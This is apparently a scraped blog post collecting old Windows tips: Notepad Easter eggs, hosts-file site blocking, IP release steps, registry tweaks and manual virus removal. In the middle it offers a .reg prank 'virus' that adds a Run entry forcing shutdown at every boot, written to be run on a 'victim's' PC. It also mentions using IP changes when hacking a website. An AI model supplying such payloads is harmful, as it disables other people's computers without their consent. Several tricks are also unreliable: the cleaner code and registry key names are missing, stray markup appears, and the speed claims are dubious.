U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That’s cause ur RAM is full of remaining progress pieces u do not need any more.
So create a new text file on ur desktop and call it .. uhm.. “RAMcleaner” or something…
in this file and save it as RAMcleaner.vbs [ You may choose the “All Files” option when u save it ]
Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater “cleaning-progress”.
How To Block Websties Without Software, block websites
1] Browse C:WINDOWSsystem32driversetc
2] Find the file named “HOSTS”
3] Open it in notepad
4] Under “127.0.0.1 localhost” Add 127.0.0.2 www.sitenameyouwantblocked.com , and that site will no longer be accessable.
–>www.blockedsite.com is now unaccessable<– data-blogger-escaped-data-blogger-escaped-span=””>
For every site after that you want to add, just add “1” to the last number in the internal ip (127.0.0.2) and then the addy like before.
IE: 127.0.0.3 www.blablabla.com
Some Notepad Tricks
1. Open a blank Notepad file
2. Write .LOG as the first line of the file, followed by a enter. Save the file and close it.
3. Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the line after.
4. Type your notes and then save and close the file.
After that open the file and see the changes.
by this trick u can also use ur notebook as a personal diary.
2. type “bush hid the facts”
3. save it and close it…
4 then open it again……..n see the changes……………
Do you know the number of the flight that was used to attack the world Trade Centre????
The flight number was Q33N.
Now, open your Notepad, type the number of the flight (i.e. Q33N).
Now click on format>font, increase the font size upto 72, and change the font style to ‘wingdings’. Now see the ammmaaazzzing thing.
Over at WinCustomize, someone thought they’d found an Easter Egg in the Windows Notepad application. If you:
1. Open Notepad
2. Type the text “this app can break” (without quotes)
3. Save the file
4. Re-open the file in Notepad
Notepad displays seemingly-random Chinese characters, or boxes if your default Notepad font doesn’t support those characters.
You can change your IP address in less than 1 min
1. Click on “Start” in the bottom left hand corner of screen
2. Click on “Run”
3. Type in “command” and hit ok
You should now be at an MSDOS prompt screen.
4. Type “ipconfig /release” just like that, and hit “enter”
5. Type “exit” and leave the prompt
6. Right-click on “Network Places” or “My Network Places” on your desktop.
7. Click on “properties”
You should now be on a screen with something titled “Local Area Connection”, or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on “Local Area Connection” and click “properties”
9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab
10. Click on “Use the following IP address” under the “General” tab
11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).
12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.
13. Hit the “Ok” button here
14. Hit the “Ok” button again
You should now be back to the “Local Area Connection” screen.
15. Right-click back on “Local Area Connection” and go to properties again.
16. Go back to the “TCP/IP” settings
17. This time, select “Obtain an IP address automatically”
18. Hit “Ok”
19. Hit “Ok” again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back
Shutdown ur system every time when it starts
put this followin text in a .reg file and run it in the victims pc:
Windows Registry Editor Version 5.00
“VIRUS”=”%windir%\SYSTEM32\SHUTDOWN.EXE -t 1 -c “Howz this new Virus ah” -f”
DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]and remove the string value named VIRUS, restart you computer.
Be careful, a drawback of the js code is that NORTON ANTIVIRUS’s script blocking feature may block this.
well i am also trying to find the method which executes without any drawbacks. So if u have one, pls post it here.
Folder Options Missing
Many of us sometimes find the folder options missing in windows explorer.
Here’s the solution–>
Open Run and then type “gpedit.msc”.
Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.
Click on Windows Explorer you will find the 3rd option on the right side of screen “Removes the Folder Option menu item from the Tools menu”
Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.
I hopes that you will find the option
Windows password hack
Hack the Windows Admin Password with a simple Trick.
File ready to be burn on a CD-ROM or a USB-Stick.
Turn on in 10 seconds
so u wanna know how to turn the pc on in 10 seconds (may vary) heres what u have to do to turn ur pc on in 10 seconds
Click on the start button then –>>go to run
then type Regedit
this will open Registery Editor
now look for the key
now there find the Key Called
Double Click On It
Now where its Base
Now its Default Value Is 4800000 (75300:hexadecimal)
Change The Value To 40000
here u go u have done it
now close the Registery Editor and Restart Your Computer
You’ll See The Result
Manually Remove a Virus
If you are tired of sitting and waiting for your anti-virus software to remove the new virus infection, the steps below are for you. No programming skills are required! Just a basic knowledge of command prompt syntax will do…for this demo, the virus is on the portable USB drive (e:virus) named virus.vbs
1. Create a back-up. Safety comes above all else. Save your files on removable storage or on another partition aside from the Windows drive.
2. Run the Windows command prompt. You can run the Windows command prompt by either clicking on the Start MenuAll programsAccessoriesCommand Prompt or by pressing Windows + R on the keyboard and typing “CMD.”
3. Look for the directory or folder where the virus resides. Go to the folder where the virus is hiding. Its usually resides on the Windows temporary folder or on the Windows system folder. Check partitions and drives for viruses, e.g. type “cd e:virus”
4. Show the hidden virus and remove its attributes. It will be easier if you can see the virus. Remove the virus attributes, which are read only, archive, system file, and hidden file. e.g. type “attrib -r -a -s -h virus.vbs”
5. Delete the virus. Say goodbye to the virus by deleting it, e.g. type “del virus.vbs”
Change ur processor name
Trick – SHOW YOUR PC PENTIUM 5,6….OR MORE…
GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>
ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSORNAMESTRING AND THEN WRITE ANYTHING U WANT IN THAT TEXTBOX
Shutdown in 3 seconds
Shut Down Windows In 3 Seconds (Win XP)
Look out for a new and safe method to shut down your pc in just 3 SECONDS……
All you need to do is open task manager ( ctrl+alt+del ) in that u’ll see a option of shutdown in the upper right corner,press this option.now press and hold ctrl key and then select turn off option from the shut down menu.you shud have hold the ctrl key in order to perform the desired task.
in 3-4 seconds your system will safely turn off.
NJOY and leave your comments